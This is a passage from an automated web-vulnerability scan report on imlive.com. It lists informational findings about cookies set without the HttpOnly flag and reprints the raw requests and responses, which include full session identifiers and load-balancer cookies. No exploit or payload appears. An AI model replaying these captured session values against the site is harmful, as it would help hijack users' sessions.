The following cookie was issued by the application and does not have the HttpOnly flag set (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /liveexperts.asp HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:11:18 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmsTHmj4p7KUq0DeR%2BO3xTkb; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:11:18 GMT
Connection: close
Content-Length: 19369
Vary: Accept-Encoding


<html>
   <head>
       <title>live webcam video chat with experts at imlive</title>
       <meta name="description" content="Live video chat sessions with experts in just about anything - Mysticism & Spir
...[SNIP]...

11.376. http://imlive.com/localcompanionship.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imlive.com
Path:   /localcompanionship.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /localcompanionship.asp HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:11:20 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmuTmCT55rdh7t3zZ04MFTzw; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:11:20 GMT
Connection: close
Content-Length: 16528
Vary: Accept-Encoding


<html>
   <head>
       <title>Friends & Romance on Webcam Video Chat at ImLive</title>
       <meta name="description" content="Like shopping? Go out to restaurants? Find your soul mate on live webcam vid
...[SNIP]...

11.377. http://imlive.com/minglesingles.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imlive.com
Path:   /minglesingles.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /minglesingles.asp HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:11:18 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmuTmCT55rdh7t3zZ04MFTzw; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:11:19 GMT
Connection: close
Content-Length: 16092
Vary: Accept-Encoding


<html>
   <head>
       <title>Mingle With Friends on Live Webcam Video Chat at ImLive</title>
       <meta name="description" content="Mingle with Singles on live webcam video chat - Find a match and go on
...[SNIP]...

11.378. http://imlive.com/pr.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imlive.com
Path:   /pr.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pr.asp HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:11:28 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:11:27 GMT
Connection: close
Content-Length: 9835
Vary: Accept-Encoding


<!--include file="help/CustomerServiceEmails.inc"-->

<html>
   <head>
       <title>Public Relations of ImLive Video Chat</title>
       
<link rel="stylesheet" type="text/css" href="http://i1.imlive.com
...[SNIP]...

11.379. http://imlive.com/preparesearch.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imlive.com
Path:   /preparesearch.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /preparesearch.aspx HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:23 GMT
Connection: close
Content-Length: 18859
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...

11.380. http://imlive.com/sex_webcams_index/index.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imlive.com
Path:   /sex_webcams_index/index.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (see the Set-Cookie headers in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sex_webcams_index/index.asp HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:23:00 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2FSf8bs6wRlvXx1sFag%3D%3D; path=/
Set-Cookie: ix=k; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:23:00 GMT
Connection: close
Content-Length: 23768
Vary: Accept-Encoding


<html>
   <head>
       <title>
           Live Sex Chat Categories at ImLive
       </title>
       <meta name="description" content="Live sex chat with girls, lesbians, gays, couples, threesomes and fetish lovers. CO
...[SNIP]...

11.381. http://imlive.com/sitemap.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imlive.com
Path:   /sitemap.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (see the Set-Cookie headers in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sitemap.html HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:23:00 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2FSf8bs6wRlvXx1sFag%3D%3D; path=/
Set-Cookie: ix=k; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:23:00 GMT
Connection: close
Content-Length: 33732
Vary: Accept-Encoding


<html>
<head>
<meta name="keywords" content="live Video Chat, Video Chat live, Video Chat live, live Video Chat, webcam chat, live web cam, webcam live, live webcam, web cam live, web cam communti
...[SNIP]...

11.382. http://imlive.com/videosfr.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imlive.com
Path:   /videosfr.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /videosfr.asp HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:11:20 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmuTmCT55rdh7t3zZ04MFTzw; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:11:21 GMT
Connection: close
Content-Length: 15706
Vary: Accept-Encoding


<html>
   <head>
       <title>Video Chat Recorded on Webcam at ImLive</title>
       <meta name="description" content="Come in and discover what our hosts have recorded in Friends & Romance live webcam vide
...[SNIP]...

11.383. http://imlive.com/warningms.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imlive.com
Path:   /warningms.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (see the Set-Cookie headers in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /warningms.asp HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:23:28 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxgivxzPskYVay%2FvTxhkZKJA%3D%3D; path=/
Set-Cookie: ix=k; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:23:28 GMT
Connection: close
Content-Length: 14418
Vary: Accept-Encoding


<html>
<head>
<title>ImLive.com - warning </title>
</head>

<BODY bgcolor="#ffffff" topmargin=0 alink="#336699" vlink="#336699" link="#336699">
<center>
<script language="JavaScript" type="t
...[SNIP]...

11.384. http://imlive.com/webcam-advanced-search/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imlive.com
Path:   /webcam-advanced-search/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webcam-advanced-search/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhoqyccjVCXBTf954wWPYvp64MXC0Yh32GzThoTYj52vyg%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:23:56 GMT
Connection: close
Content-Length: 74384
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...

11.385. http://imlive.com/webcam-faq/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imlive.com
Path:   /webcam-faq/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (see the Set-Cookie headers in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webcam-faq/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ix=s; path=/
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0aL3siby47TA1QT7oGe%2b8%2b0HFAu%2bfqcO77Lbk%2bAmjH%2bK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:11:16 GMT
Connection: close
Content-Length: 43752
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...

11.386. http://imlive.com/webcam-login/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imlive.com
Path:   /webcam-login/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (see the Set-Cookie headers in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webcam-login/ HTTP/1.1
Host: imlive.com
Proxy-Connection: keep-alive
